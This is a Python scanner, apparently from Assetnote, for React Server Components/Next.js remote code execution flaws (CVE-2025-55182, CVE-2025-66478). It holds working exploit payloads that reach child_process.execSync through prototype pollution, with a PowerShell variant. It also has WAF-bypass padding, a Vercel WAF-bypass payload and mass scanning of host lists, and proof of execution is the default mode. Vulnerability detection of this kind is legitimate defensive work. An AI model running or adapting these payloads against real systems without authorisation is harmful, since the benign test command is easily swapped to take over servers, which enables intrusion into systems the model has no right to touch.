#!/usr/bin/env python3 """ React2Shell Scanner - High Fidelity Detection for RSC/Next.js RCE CVE-2025-55182 & CVE-2025-66478 Based on research from Assetnote Security Research Team. """ import argparse import sys import json import os import random import re import string from datetime import datetime, timezone from concurrent.futures import ThreadPoolExecutor, as_completed from urllib.parse import urlparse from typing import Optional try: import requests from requests.exceptions import RequestException except ImportError: print("Error: 'requests' library required. Install with: pip install requests") sys.exit(1) try: from tqdm import tqdm except ImportError: print("Error: 'tqdm' library required. Install with: pip install tqdm") sys.exit(1) class Colors: RED = "\033[91m" GREEN = "\033[92m" YELLOW = "\033[93m" BLUE = "\033[94m" MAGENTA = "\033[95m" CYAN = "\033[96m" WHITE = "\033[97m" BOLD = "\033[1m" RESET = "\033[0m" def colorize(text: str, color: str) -> str: """Apply color to text.""" return f"{color}{text}{Colors.RESET}" def print_banner(): """Print the tool banner.""" banner = f""" {Colors.CYAN}{Colors.BOLD}brought to you by assetnote{Colors.RESET} """ print(banner) def parse_headers(header_list: list[str] | None) -> dict[str, str]: """Parse a list of 'Key: Value' strings into a dict.""" headers = {} if not header_list: return headers for header in header_list: if ": " in header: key, value = header.split(": ", 1) headers[key] = value elif ":" in header: key, value = header.split(":", 1) headers[key] = value.lstrip() return headers def normalize_host(host: str) -> str: """Normalize host to include scheme if missing.""" host = host.strip() if not host: return "" if not host.startswith(("http://", "https://")): host = f"https://{host}" return host.rstrip("/") def generate_junk_data(size_bytes: int) -> tuple[str, str]: """Generate random junk data for WAF bypass.""" param_name = ''.join(random.choices(string.ascii_lowercase, k=12)) junk = ''.join(random.choices(string.ascii_letters + string.digits, k=size_bytes)) return param_name, junk def build_safe_payload() -> tuple[str, str]: """Build the safe multipart form data payload for the vulnerability check (side-channel).""" boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad" body = ( f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="1"\r\n\r\n' f"{{}}\r\n" f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="0"\r\n\r\n' f'["$1:aa:aa"]\r\n' f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--" ) content_type = f"multipart/form-data; boundary={boundary}" return body, content_type def build_vercel_waf_bypass_payload() -> tuple[str, str]: """Build the Vercel WAF bypass multipart form data payload.""" boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad" part0 = ( '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,' '"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":' '"var res=process.mainModule.require(\'child_process\').execSync(\'echo $((41*271))\').toString().trim();;' 'throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",' '"_chunks":"$Q2","_formData":{"get":"$3:\\"$$:constructor:constructor"}}}' ) body = ( f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="0"\r\n\r\n' f"{part0}\r\n" f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="1"\r\n\r\n' f'"$@0"\r\n' f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="2"\r\n\r\n' f"[]\r\n" f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="3"\r\n\r\n' f'{{"\\"\u0024\u0024":{{}}}}\r\n' f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--" ) content_type = f"multipart/form-data; boundary={boundary}" return body, content_type def build_rce_payload(windows: bool = False, waf_bypass: bool = False, waf_bypass_size_kb: int = 128) -> tuple[str, str]: """Build the RCE PoC multipart form data payload.""" boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad" if windows: # PowerShell payload - escape double quotes for JSON cmd = 'powershell -c \\\"41*271\\\"' else: # Linux/Unix payload cmd = 'echo $((41*271))' prefix_payload = ( f"var res=process.mainModule.require('child_process').execSync('{cmd}')" f".toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT')," f"{{digest: `NEXT_REDIRECT;push;/login?a=${{res}};307;`}});" ) part0 = ( '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,' '"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"' + prefix_payload + '","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}' ) parts = [] # Add junk data at the start if WAF bypass is enabled if waf_bypass: param_name, junk = generate_junk_data(waf_bypass_size_kb * 1024) parts.append( f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="{param_name}"\r\n\r\n' f"{junk}\r\n" ) parts.append( f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="0"\r\n\r\n' f"{part0}\r\n" ) parts.append( f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="1"\r\n\r\n' f'"$@0"\r\n' ) parts.append( f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" f'Content-Disposition: form-data; name="2"\r\n\r\n' f"[]\r\n" ) parts.append("------WebKitFormBoundaryx8jO2oVc6SWP3Sad--") body = "".join(parts) content_type = f"multipart/form-data; boundary={boundary}" return body, content_type def resolve_redirects(url: str, timeout: int, verify_ssl: bool, max_redirects: int = 10) -> str: """Follow redirects only if they stay on the same host.""" current_url = url original_host = urlparse(url).netloc for _ in range(max_redirects): try: response = requests.head( current_url, timeout=timeout, verify=verify_ssl, allow_redirects=False ) if response.status_code in (301, 302, 303, 307, 308): location = response.headers.get("Location") if location: if location.startswith("/"): # Relative redirect - same host, safe to follow parsed = urlparse(current_url) current_url = f"{parsed.scheme}://{parsed.netloc}{location}" else: # Absolute redirect - check if same host new_host = urlparse(location).netloc if new_host == original_host: current_url = location else: break # Different host, stop following else: break else: break except RequestException: break return current_url def send_payload(target_url: str, headers: dict, body: str, timeout: int, verify_ssl: bool) -> tuple[requests.Response | None, str | None]: """Send the exploit payload to a URL. Returns (response, error).""" try: # Encode body as bytes to ensure proper Content-Length calculation # and avoid potential encoding issues with the HTTP client body_bytes = body.encode('utf-8') if isinstance(body, str) else body response = requests.post( target_url, headers=headers, data=body_bytes, timeout=timeout, verify=verify_ssl, allow_redirects=False ) return response, None except requests.exceptions.SSLError as e: return None, f"SSL Error: {str(e)}" except requests.exceptions.ConnectionError as e: return None, f"Connection Error: {str(e)}" except requests.exceptions.Timeout: return None, "Request timed out" except RequestException as e: return None, f"Request failed: {str(e)}" except Exception as e: return None, f"Unexpected error: {str(e)}" def is_vulnerable_safe_check(response: requests.Response) -> bool: """Check if a response indicates vulnerability (safe side-channel check).""" if response.status_code != 500 or 'E{"digest"' not in response.text: return False # Check for Vercel/Netlify mitigations (not valid findings) server_header = response.headers.get("Server", "").lower() has_netlify_vary = "Netlify-Vary" in response.headers is_mitigated = ( has_netlify_vary or server_header == "netlify" or server_header == "vercel" ) return not is_mitigated def is_vulnerable_rce_check(response: requests.Response) -> bool: """Check if a response indicates vulnerability (RCE PoC check).""" # Check for the X-Action-Redirect header with the expected value redirect_header = response.headers.get("X-Action-Redirect", "") return bool(re.search(r'.*/login\?a=11111.*', redirect_header)) def check_vulnerability(host: str, timeout: int = 10, verify_ssl: bool = True, follow_redirects: bool = True, custom_headers: dict[str, str] | None = None, safe_check: bool = False, windows: bool = False, waf_bypass: bool = False, waf_bypass_size_kb: int = 128, vercel_waf_bypass: bool = False) -> dict: """ Check if a host is vulnerable to CVE-2025-55182/CVE-2025-66478. Tests root path first. If not vulnerable and redirects exist, tests redirect path. Returns a dict with: - host: the target host - vulnerable: True/False/None (None if error) - status_code: HTTP status code - error: error message if any - request: the raw request sent - response: the raw response received """ result = { "host": host, "vulnerable": None, "status_code": None, "error": None, "request": None, "response": None, "final_url": None, "timestamp": datetime.now(timezone.utc).isoformat() + "Z" } host = normalize_host(host) if not host: result["error"] = "Invalid or empty host" return result root_url = f"{host}/" if safe_check: body, content_type = build_safe_payload() is_vulnerable = is_vulnerable_safe_check elif vercel_waf_bypass: body, content_type = build_vercel_waf_bypass_payload() is_vulnerable = is_vulnerable_rce_check else: body, content_type = build_rce_payload(windows=windows, waf_bypass=waf_bypass, waf_bypass_size_kb=waf_bypass_size_kb) is_vulnerable = is_vulnerable_rce_check headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0", "Next-Action": "x", "X-Nextjs-Request-Id": "b5dce965", "Content-Type": content_type, "X-Nextjs-Html-Request-Id": "SSTMXm7OJ_g0Ncx6jpQt9", } # Apply custom headers (override defaults) if custom_headers: headers.update(custom_headers) def build_request_str(url: str) -> str: parsed = urlparse(url) req_str = f"POST {'/aaa' or '/aaa'} HTTP/1.1\r\n" req_str += f"Host: {parsed.netloc}\r\n" for k, v in headers.items(): req_str += f"{k}: {v}\r\n" req_str += f"Content-Length: {len(body)}\r\n\r\n" req_str += body return req_str def build_response_str(resp: requests.Response) -> str: resp_str = f"HTTP/1.1 {resp.status_code} {resp.reason}\r\n" for k, v in resp.headers.items(): resp_str += f"{k}: {v}\r\n" resp_str += f"\r\n{resp.text[:2000]}" return resp_str # First, test the root path result["final_url"] = root_url result["request"] = build_request_str(root_url) response, error = send_payload(root_url, headers, body, timeout, verify_ssl) if error: result["error"] = error return result result["status_code"] = response.status_code result["response"] = build_response_str(response) if is_vulnerable(response): result["vulnerable"] = True return result # Root not vulnerable - try redirect path if enabled if follow_redirects: try: redirect_url = resolve_redirects(root_url, timeout, verify_ssl) if redirect_url != root_url: # Different path, test it response, error = send_payload(redirect_url, headers, body, timeout, verify_ssl) if error: # Keep root result but note the redirect failed result["vulnerable"] = False return result result["final_url"] = redirect_url result["request"] = build_request_str(redirect_url) result["status_code"] = response.status_code result["response"] = build_response_str(response) if is_vulnerable(response): result["vulnerable"] = True return result except Exception: pass # Continue with root result if redirect resolution fails result["vulnerable"] = False return result def load_hosts(hosts_file: str) -> list[str]: """Load hosts from a file, one per line.""" hosts = [] try: with open(hosts_file, "r") as f: for line in f: host = line.strip() if host and not host.startswith("#"): hosts.append(host) except FileNotFoundError: print(colorize(f"[ERROR] File not found: {hosts_file}", Colors.RED)) sys.exit(1) except Exception as e: print(colorize(f"[ERROR] Failed to read file: {e}", Colors.RED)) sys.exit(1) return hosts def save_results(results: list[dict], output_file: str, vulnerable_only: bool = True): if vulnerable_only: results = [r for r in results if r.get("vulnerable") is True] output = { "scan_time": datetime.now(timezone.utc).isoformat() + "Z", "total_results": len(results), "results": results } try: with open(output_file, "w") as f: json.dump(output, f, indent=2) print(colorize(f"\n[+] Results saved to: {output_file}", Colors.GREEN)) except Exception as e: print(colorize(f"\n[ERROR] Failed to save results: {e}", Colors.RED)) def print_result(result: dict, verbose: bool = False): host = result["host"] final_url = result.get("final_url") redirected = final_url and final_url != f"{normalize_host(host)}/" if result["vulnerable"] is True: status = colorize("[VULNERABLE]", Colors.RED + Colors.BOLD) print(f"{status} {colorize(host, Colors.WHITE)} - Status: {result['status_code']}") if redirected: print(f" -> Redirected to: {final_url}") elif result["vulnerable"] is False: status = colorize("[NOT VULNERABLE]", Colors.GREEN) print(f"{status} {host} - Status: {result['status_code']}") if redirected and verbose: print(f" -> Redirected to: {final_url}") else: status = colorize("[ERROR]", Colors.YELLOW) error_msg = result.get("error", "Unknown error") print(f"{status} {host} - {error_msg}") if verbose and result["vulnerable"]: print(colorize(" Response snippet:", Colors.CYAN)) if result.get("response"): lines = result["response"].split("\r\n")[:10] for line in lines: print(f" {line}") def main(): parser = argparse.ArgumentParser( description="React2Shell Scanner", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: %(prog)s -u https://example.com %(prog)s -l hosts.txt -t 20 -o results.json %(prog)s -l hosts.txt --threads 50 --timeout 15 %(prog)s -u https://example.com -H "Authorization: Bearer token" -H "User-Agent: CustomAgent" """ ) input_group = parser.add_mutually_exclusive_group(required=True) input_group.add_argument( "-u", "--url", help="Single URL/host to check" ) input_group.add_argument( "-l", "--list", help="File containing list of hosts (one per line)" ) parser.add_argument( "-t", "--threads", type=int, default=10, help="Number of concurrent threads (default: 10)" ) parser.add_argument( "--timeout", type=int, default=10, help="Request timeout in seconds (default: 10)" ) parser.add_argument( "-o", "--output", help="Output file for results (JSON format)" ) parser.add_argument( "--all-results", action="store_true", help="Save all results to output file, not just vulnerable hosts" ) parser.add_argument( "-k", "--insecure", default=True, action="store_true", help="Disable SSL certificate verification" ) parser.add_argument( "-H", "--header", action="append", dest="headers", metavar="HEADER", help="Custom header in 'Key: Value' format (can be used multiple times)" ) parser.add_argument( "-v", "--verbose", action="store_true", help="Verbose output (show response snippets for vulnerable hosts)" ) parser.add_argument( "-q", "--quiet", action="store_true", help="Quiet mode (only show vulnerable hosts)" ) parser.add_argument( "--no-color", action="store_true", help="Disable colored output" ) parser.add_argument( "--safe-check", action="store_true", help="Use safe side-channel detection instead of RCE PoC" ) parser.add_argument( "--windows", action="store_true", help="Use Windows PowerShell payload instead of Unix shell" ) parser.add_argument( "--waf-bypass", action="store_true", help="Add junk data to bypass WAF content inspection (default: 128KB)" ) parser.add_argument( "--waf-bypass-size", type=int, default=128, metavar="KB", help="Size of junk data in KB for WAF bypass (default: 128)" ) parser.add_argument( "--vercel-waf-bypass", action="store_true", help="Use Vercel WAF bypass payload variant" ) args = parser.parse_args() if args.no_color or not sys.stdout.isatty(): Colors.RED = "" Colors.GREEN = "" Colors.YELLOW = "" Colors.BLUE = "" Colors.MAGENTA = "" Colors.CYAN = "" Colors.WHITE = "" Colors.BOLD = "" Colors.RESET = "" if not args.quiet: print_banner() if args.url: hosts = [args.url] else: hosts = load_hosts(args.list) if not hosts: print(colorize("[ERROR] No hosts to scan", Colors.RED)) sys.exit(1) # Adjust timeout for WAF bypass mode timeout = args.timeout if args.waf_bypass and args.timeout == 10: timeout = 20 if not args.quiet: print(colorize(f"[*] Loaded {len(hosts)} host(s) to scan", Colors.CYAN)) print(colorize(f"[*] Using {args.threads} thread(s)", Colors.CYAN)) print(colorize(f"[*] Timeout: {timeout}s", Colors.CYAN)) if args.safe_check: print(colorize("[*] Using safe side-channel check", Colors.CYAN)) else: print(colorize("[*] Using RCE PoC check", Colors.CYAN)) if args.windows: print(colorize("[*] Windows mode enabled (PowerShell payload)", Colors.CYAN)) if args.waf_bypass: print(colorize(f"[*] WAF bypass enabled ({args.waf_bypass_size}KB junk data)", Colors.CYAN)) if args.vercel_waf_bypass: print(colorize("[*] Vercel WAF bypass mode enabled", Colors.CYAN)) if args.insecure: print(colorize("[!] SSL verification disabled", Colors.YELLOW)) print() results = [] vulnerable_count = 0 error_count = 0 verify_ssl = not args.insecure custom_headers = parse_headers(args.headers) if args.insecure: import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) if len(hosts) == 1: result = check_vulnerability(hosts[0], timeout, verify_ssl, custom_headers=custom_headers, safe_check=args.safe_check, windows=args.windows, waf_bypass=args.waf_bypass, waf_bypass_size_kb=args.waf_bypass_size, vercel_waf_bypass=args.vercel_waf_bypass) results.append(result) if not args.quiet or result["vulnerable"]: print_result(result, args.verbose) if result["vulnerable"]: vulnerable_count = 1 else: with ThreadPoolExecutor(max_workers=args.threads) as executor: futures = { executor.submit(check_vulnerability, host, timeout, verify_ssl, custom_headers=custom_headers, safe_check=args.safe_check, windows=args.windows, waf_bypass=args.waf_bypass, waf_bypass_size_kb=args.waf_bypass_size, vercel_waf_bypass=args.vercel_waf_bypass): host for host in hosts } with tqdm( total=len(hosts), desc=colorize("Scanning", Colors.CYAN), unit="host", ncols=80, disable=args.quiet ) as pbar: for future in as_completed(futures): result = future.result() results.append(result) if result["vulnerable"]: vulnerable_count += 1 tqdm.write("") print_result(result, args.verbose) elif result["error"]: error_count += 1 if not args.quiet and args.verbose: tqdm.write("") print_result(result, args.verbose) elif not args.quiet and args.verbose: tqdm.write("") print_result(result, args.verbose) pbar.update(1) if not args.quiet: print() print(colorize("=" * 60, Colors.CYAN)) print(colorize("SCAN SUMMARY", Colors.BOLD)) print(colorize("=" * 60, Colors.CYAN)) print(f" Total hosts scanned: {len(hosts)}") if vulnerable_count > 0: print(f" {colorize(f'Vulnerable: {vulnerable_count}', Colors.RED + Colors.BOLD)}") else: print(f" Vulnerable: {vulnerable_count}") print(f" Not vulnerable: {len(hosts) - vulnerable_count - error_count}") print(f" Errors: {error_count}") print(colorize("=" * 60, Colors.CYAN)) if args.output: save_results(results, args.output, vulnerable_only=not args.all_results) if vulnerable_count > 0: sys.exit(1) sys.exit(0) if __name__ == "__main__": main()